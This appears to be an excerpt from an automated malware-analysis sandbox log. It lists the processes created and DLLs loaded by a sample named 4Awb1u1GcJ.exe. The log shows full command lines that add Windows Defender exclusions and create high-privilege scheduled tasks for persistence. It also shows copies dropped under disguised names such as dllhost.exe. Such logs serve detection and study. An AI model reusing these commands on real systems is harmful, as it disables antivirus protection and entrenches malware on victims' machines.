Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4Awb1u1GcJ.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\4Awb1u1GcJ.exe C:\Users\user\Desktop\4Awb1u1GcJ.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Users\user\Desktop\4Awb1u1GcJ.exe C:\Users\user\Desktop\4Awb1u1GcJ.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe C:\Users\user\NetHood\dllhost.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe C:\Users\user\NetHood\dllhost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe "C:\Users\user\NetHood\dllhost.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe "C:\Users\user\NetHood\dllhost.exe"
Source: unknown	Process created: C:\Users\user\Desktop\4Awb1u1GcJ.exe "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
Source: unknown	Process created: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe "C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe "C:\Users\user\NetHood\dllhost.exe"
Source: unknown	Process created: C:\Users\user\Desktop\4Awb1u1GcJ.exe "C:\Users\user\Desktop\4Awb1u1GcJ.exe"
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmfl24ds\lmfl24ds.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\PrintHood\hxpWOXgnBGVLArPcwqxpuA.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hxpWOXgnBGVLArPcwqxpuAh" /sc MINUTE /mo 13 /tr "'C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\NetHood\dllhost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\4Awb1u1GcJ.exe'	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\RM8EX6c6Td.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1D7.tmp" "c:\Windows\System32\CSC3F9C54C7EA774D8CB8E83128B6DCF481.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\dllhost.exe "C:\Users\user\NetHood\dllhost.exe"

Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\4Awb1u1GcJ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Recovery\hxpWOXgnBGVLArPcwqxpuA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
